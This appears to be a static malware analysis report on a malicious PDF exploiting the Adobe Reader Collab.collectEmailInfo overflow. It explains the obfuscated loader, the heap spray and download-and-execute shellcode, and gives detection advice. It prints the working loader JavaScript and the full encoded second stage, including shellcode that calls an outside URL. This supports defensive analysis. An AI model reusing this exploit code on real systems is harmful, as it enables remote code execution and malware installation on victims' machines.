Malicious PDF — malware analysis report

Static analysis result for SHA-256 db850cc79b55d80a…

MALICIOUS

PDF

7.9 KB Created: 2009-07-13 19:22:54 Authoring application: sOY (via jsi) First seen: 2026-05-08
MD5: 4b4f283cfedc9ef514c906a36b7a64d5 SHA-1: 5c8ec76d60828df96f2119fad6fd8c82115fbcd7 SHA-256: db850cc79b55d80add968d1ce5559f956b87efde8234c2ccdb2622d91dac0a6d
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript — the sample executes embedded Acrobat JavaScript (objects 6 and 7); T1203 Exploitation for Client Execution — the decoded second stage heap-sprays and then calls Collab.collectEmailInfo with an oversized argument. Nothing in the file invokes PowerShell, so the original T1059.001 mapping is not supported by the sample contents.

The PDF carries a /JavaScript action (object 7, reached through the /Names tree in object 2) whose /JS stream (object 6) is a 318-byte first-stage loader, which is why the PDF_JAVASCRIPT, PDF_JS and PDF_UNESCAPE heuristics fire. The loader derives the string 'eval' from `new Date(2010,11,3).getHours()+'al'` (getHours() is 0, and `.replace(0,'ev')` turns '0al' into 'eval'), looks it up as `this['eval']`, and evaluates a string it assembles from fragments: `hghs=this.info; ax=(hghs.fixpdf).replace(/(*)/g,unescape("%25")); eval(unescape(ax));`. The real payload is therefore not in the JS stream at all: it is stored under the custom key /fixpdf in the document Info dictionary (object 8), with `*` standing in for `%` so the stream contains no literal percent-encoding. Decoding /fixpdf (replace `*` with `%`, then unescape) yields a second stage that rebuilds sensitive identifiers by stripping filler characters with a character-class RegExp — 'xl7e5nNg1t5h' minus [P51N7x] gives 'length', 'jsSucbqsJtmrJijnSg' minus [qjmDJcSF4] gives 'substring', 'BcLoBlMlBaBbLSMtBoMrBe' minus [BKUML] gives 'collabStore', '2cuoWlrlue4c2t2EumW4auiVl4I4nufzo' minus [2u4VzrW] gives 'collectEmailInfo'. It then heap-sprays 48 blocks of 4 MB (`sunpalladin` = 4011762+182542 = 4194304), each a NOP-style sled padded up to the block size plus the %u-encoded shellcode, so that address 0x0C0C0C0C (`chieftain` = 324819239-122703131 = 202116108) lands inside the spray, and finally calls `Collab.collectEmailInfo({subj:'', msg:<'%u0c0c' doubled until longer than 44952 characters>})`. That call with an oversized msg is the Adobe Reader Collab.collectEmailInfo overflow (consistent with CVE-2007-5659, which fits the 2009 creation date). The shellcode appears to begin with a `mov eax, fs:[0x30]` PEB walk, pushes the string 'urlmon', and embeds the URL hxxp://bqpp[.]ws/55/portalswap.php? — i.e. a download-and-execute stub, not an unspecified "second-stage download". The metadata values (Creator sOY, Title X8pc, Producer jsi, Author bCN) are random filler from the generator; 'jsi' is not evidence of JavaScript use, only a weak sign of a machine-generated document. Detection note: because stage two lives in the Info dictionary rather than in a /JS stream, stream-only scanning misses the exploit (ClamAV reported no threats on either carved artifact); rules should also flag long `*`- or `%`-delimited hex strings in Info dictionary keys and the `this.info.<key>` read pattern in document-level JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis. Both artifacts come from the same /JS object 6: the first (318 bytes at 0x19D) is the loader script proper, while the second (7,685 bytes at 0x1C5) runs past `endstream` to `%%EOF`, which is why its preview also shows objects 7, 2 and 8 and the xref/trailer. That over-read is useful here, since the Info dictionary in object 8 holds the /fixpdf key that the loader reads via `this.info.fixpdf` and evaluates — the actual exploit stage.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x19D 318 bytes
SHA-256: ceecfabe7c97ce3e439a70e274c2e2efb21a3300d9d9e75d5cb1a057b1a80936
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0x1C5 7685 bytes
SHA-256: 447a5405f70a7a92514b5f841322a9592282099b72c3954650a604cbe3dcd459
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
endstream
endobj 
7 0 obj 
<<
/JS 6 0 R
/S /JavaScript
>>
endobj 
2 0 obj 
<<
/Names [(LpE) 7 0 R]
>>
endobj 
8 0 obj 
<<
/Creator (sOY)
/Title (X8pc)
/Producer (jsi)
/Author (bCN)
/fixpdf  (*77*61*72*66*72*61*67*3D*27*27*3B*66*75*6E*63*74*69*6F*6E*20*67*72*75*6E*74*70*72*69*6E*74*28*77*61*72*64*73*65*6E*74*72*79*2C*73*74*75*6D*70*74*72*61*70*29*7B*72*65*74*75*72*6E*20*77*61*72*64*73*65*6E*74*72*79*2E*72*65*70*6C*61*63*65*28*73*74*75*6D*70*74*72*61*70*2C*77*61*72*66*72*61*67*29*3B*7D*66*75*6E*63*74*69*6F*6E*20*79*65*79*73*6B*61*64*69*28*68*79*70*70*6F*69*6C*6F*6C*7A*29*7B*72*65*74*75*72*6E*20*6E*65*77*20*52*65*67*45*78*70*28*27*5B*27*2B*68*79*70*70*6F*69*6C*6F*6C*7A*2B*27*5D*27*2C*27*67*27*29*3B*7D*66*75*6E*63*74*69*6F*6E*20*63*68*69*6D*7A*64*72*65*61*6D*28*74*6F*74*6F*62*6C*6F*77*2C*70*6F*6C*61*72*65*63*6C*69*70*73*65*29*7B*20*20*66*6F*6F*74*7A*62*6F*6F*6D*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*78*6C*37*65*35*6E*4E*67*31*74*35*68*27*2C*79*65*79*73*6B*61*64*69*28*27*50*35*31*4E*37*78*27*29*29*3B*20*20*77*68*69*6C*65*28*74*6F*74*6F*62*6C*6F*77*5B*66*6F*6F*74*7A*62*6F*6F*6D*5D*2A*32*3C*70*6F*6C*61*72*65*63*6C*69*70*73*65*29*7B*20*20*20*20*74*6F*74*6F*62*6C*6F*77*2B*3D*74*6F*74*6F*62*6C*6F*77*3B*20*20*7D*20*20*74*72*6F*6C*6C*68*75*6E*74*65*72*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*6A*73*53*75*63*62*71*73*4A*74*6D*72*4A*69*6A*6E*53*67*27*2C*79*65*79*73*6B*61*64*69*28*27*71*6A*6D*44*4A*63*53*46*34*27*29*29*3B*20*20*74*6F*74*6F*62*6C*6F*77*3D*74*6F*74*6F*62*6C*6F*77*5B*74*72*6F*6C*6C*68*75*6E*74*65*72*5D*28*30*2C*20*70*6F*6C*61*72*65*63*6C*69*70*73*65*2F*32*29*3B*20*20*72*65*74*75*72*6E*20*74*6F*74*6F*62*6C*6F*77*3B*7D*62*61*74*72*69*64*65*72*3D*6E*65*77*20*41*72*72*61*79*28*29*3B*63*68*69*65*66*74*61*69*6E*3D*33*32*34*38*31*39*32*33*39*2D*31*32*32*37*30*33*31*33*31*3B*73*75*6E*70*61*6C*6C*61*64*69*6E*3D*34*30*31*31*37*36*32*2B*31*38*32*35*34*32*3B*63*6F*69*6C*6E*6F*76*61*3D*75*6E*65*73*63*61*70*65*28*22*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*66*62*65*39*25*75*30*30*30*30*25*75*35*66*30*30*25*75*61*31*36*34*25*75*30*30*33*30*25*75*30*30*30*
30*25*75*34*30*38*62*25*75*38*62*30*63*25*75*31*63*37*30*25*75*38*62*61*64*25*75*32*30*36*38*25*75*37*64*38*30*25*75*33*33*30*63*25*75*30*33*37*34*25*75*65*62*39*36*25*75*38*62*66*33*25*75*30*38*36*38*25*75*66*37*38*62*25*75*30*34*36*61*25*75*65*38*35*39*25*75*30*30*38*66*25*75*30*30*30*30*25*75*66*39*65*32*25*75*36*66*36*38*25*75*30*30*36*65*25*75*36*38*30*30*25*75*37*32*37*35*25*75*36*64*36*63*25*75*66*66*35*34*25*75*38*62*31*36*25*75*65*38*65*38*25*75*30*30*37*39*25*75*30*30*30*30*25*75*64*37*38*62*25*75*38*30*34*37*25*75*30*30*33*66*25*75*66*61*37*35*25*75*35*37*34*37*25*75*38*30*34*37*25*75*30*30*33*66*25*75*66*61*37*35*25*75*65*66*38*62*25*75*33*33*35*66*25*75*38*31*63*39*25*75*30*34*65*63*25*75*30*30*30*31*25*75*38*62*30*30*25*75*35*31*64*63*25*75*35*33*35*32*25*75*30*34*36*38*25*75*30*30*30*31*25*75*66*66*30*30*25*75*30*63*35*36*25*75*35*39*35*61*25*75*35*32*35*31*25*75*30*32*38*62*25*75*34*33*35*33*25*75*33*62*38*30*25*75*37*35*30*30*25*75*38*31*66*61*25*75*66*63*37*62*25*75*36*35*32*65*25*75*36*35*37*38*25*75*30*33*37*35*25*75*65*62*38*33*25*75*38*39*30*38*25*75*63*37*30*33*25*75*30*34*34*33*25*75*36*35*32*65*25*75*36*35*37*38*25*75*34*33*63*36*25*75*30*30*30*38*25*75*38*61*35*62*25*75*30*34*63*31*25*75*38*38*33*30*25*75*30*30*34*35*25*75*63*30*33*33*25*75*35*30*35*30*25*75*35*37*35*33*25*75*66*66*35*30*25*75*31*30*35*36*25*75*66*38*38*33*25*75*37*35*30*30*25*75*36*61*30*36*25*75*35*33*30*31*25*75*35*36*66*66*25*75*35*61*30*34*25*75*38*33*35*39*25*75*30*34*63*32*25*75*38*30*34*31*25*75*30*30*33*61*25*75*62*34*37*35*25*75*35*36*66*66*25*75*35*31*30*38*25*75*38*62*35*36*25*75*33*63*37*35*25*75*37*34*38*62*25*75*37*38*33*35*25*75*66*35*30*33*25*75*38*62*35*36*25*75*32*30*37*36*25*75*66*35*30*33*25*75*63*39*33*33*25*75*34*31*34*39*25*75*30*33*61*64*25*75*33*33*63*35*25*75*30*66*64*62*25*75*31*30*62*65*25*75*66*32*33*38*25*75*30*38*37*34*25*75*63*62*63*31*25*75*30*33*30*64*25*75*34*30*64*61*25*75*66*31*65*62*25*75*31*66*33*62*25*75*65*37*37*35*25*75*38*62*35*65
*25*75*32*34*35*65*25*75*64*64*30*33*25*75*38*62*36*36*25*75*34*62*30*63*25*75*35*65*38*62*25*75*30*33*31*63*25*75*38*62*64*64*25*75*38*62*30*34*25*75*63*35*30*33*25*75*35*65*61*62*25*75*63*33*35*39*25*75*30*30*65*38*25*75*66*66*66*66*25*75*38*65*66*66*25*75*30*65*34*65*25*75*39*38*65*63*25*75*38*61*66*65*25*75*37*65*30*65*25*75*65*32*64*38*25*75*33*33*37*33*25*75*38*61*63*61*25*75*33*36*35*62*25*75*32*66*31*61*25*75*34*61*37*30*25*75*34*35*34*64*25*75*30*30*36*34*25*75*37*34*36*38*25*75*37*30*37*34*25*75*32*46*33*41*25*75*36*32*32*46*25*75*37*30*37*31*25*75*32*45*37*30*25*75*37*33*37*37*25*75*33*35*32*46*25*75*32*46*33*35*25*75*36*46*37*30*25*75*37*34*37*32*25*75*36*43*36*31*25*75*37*37*37*33*25*75*37*30*36*31*25*75*37*30*32*45*25*75*37*30*36*38*25*75*30*30*33*46*25*75*30*30*30*30*25*75*30*30*30*30*22*29*3B*6D*69*6C*6C*69*74*61*72*79*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*70*6C*70*65*44*6E*39*67*77*74*39*68*27*2C*79*65*79*73*6B*61*64*69*28*27*53*39*4C*77*30*70*44*27*29*29*3B*6C*69*63*68*6B*69*6E*67*3D*63*6F*69*6C*6E*6F*76*61*5B*6D*69*6C*6C*69*74*61*72*79*5D*2A*32*3B*6C*61*6D*62*64*61*3D*73*75*6E*70*61*6C*6C*61*64*69*6E*2D*28*6C*69*63*68*6B*69*6E*67*2B*36*33*2D*37*29*3B*70*72*6F*66*66*61*69*72*3D*75*6E*65*73*63*61*70*65*28*27*25*75*39*30*39*30*25*75*39*30*39*30*27*29*3B*70*72*6F*66*66*61*69*72*3D*63*68*69*6D*7A*64*72*65*61*6D*28*70*72*6F*66*66*61*69*72*2C*20*6C*61*6D*62*64*61*29*3B*68*61*77*6B*6E*75*6B*65*3D*28*63*68*69*65*66*74*61*69*6E*2D*32*35*30*32*30*37*35*2B*31*36*39*32*32*32*39*29*2F*73*75*6E*70*61*6C*6C*61*64*69*6E*3B*66*6F*72*28*69*7A*69*70*72*69*6E*74*3D*30*3B*20*69*7A*69*70*72*69*6E*74*3C*68*61*77*6B*6E*75*6B*65*3B*20*69*7A*69*70*72*69*6E*74*2B*2B*29*7B*20*20*62*61*74*72*69*64*65*72*5B*69*7A*69*70*72*69*6E*74*5D*3D*70*72*6F*66*66*61*69*72*2B*63*6F*69*6C*6E*6F*76*61*3B*7D*68*75*6E*74*7A*6F*77*6E*3D*75*6E*65*73*63*61*70*65*28*27*25*75*30*63*30*63*25*75*30*63*30*63*27*29*3B*73*6F*70*62*75*6C*6C*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*70*6C*4C*65*59*6E*4B*67*4
6*74*4A*68*27*2C*79*65*79*73*6B*61*64*69*28*27*59*4A*52*46*4C*4B*70*27*29*29*3B*77*68*69*6C*65*28*68*75*6E*74*7A*6F*77*6E*5B*73*6F*70*62*75*6C*6C*5D*3C*34*34*39*35*32*29*7B*20*20*68*75*6E*74*7A*6F*77*6E*2B*3D*68*75*6E*74*7A*6F*77*6E*3B*7D*67*65*6C*73*4F*63*61*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*42*63*4C*6F*42*6C*4D*6C*42*61*42*62*4C*53*4D*74*42*6F*4D*72*42*65*27*2C*79*65*79*73*6B*61*64*69*28*27*42*4B*55*4D*4C*27*29*29*3B*70*73*69*6E*69*6C*73*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*32*63*75*6F*57*6C*72*6C*75*65*34*63*32*74*32*45*75*6D*34*61*75*69*56*6C*34*49*34*6E*75*66*7A*6F*27*2C*79*65*79*73*6B*61*64*69*28*27*32*75*34*56*7A*72*57*27*29*29*3B*74*68*69*73*20*5B*67*65*6C*73*4F*63*61*5D*3D*43*6F*6C*6C*61*62*5B*70*73*69*6E*69*6C*73*5D*28*7B*20*20*73*75*62*6A*3A*77*61*72*66*72*61*67*2C*20*6D*73*67*3A*68*75*6E*74*7A*6F*77*6E*7D*29*3B)
/CreationDate (D:20090713192254)
>>
endobj xref
0 9
0000000000 65535 f 
0000000015 00000 n 
0000000742 00000 n 
0000000122 00000 n 
0000000181 00000 n 
0000000287 00000 n 
0000000371 00000 n 
0000000694 00000 n 
0000000786 00000 n 
trailer

<<
/Info 8 0 R
/Root 1 0 R
/Size 9
>>
startxref
7275
%%EOF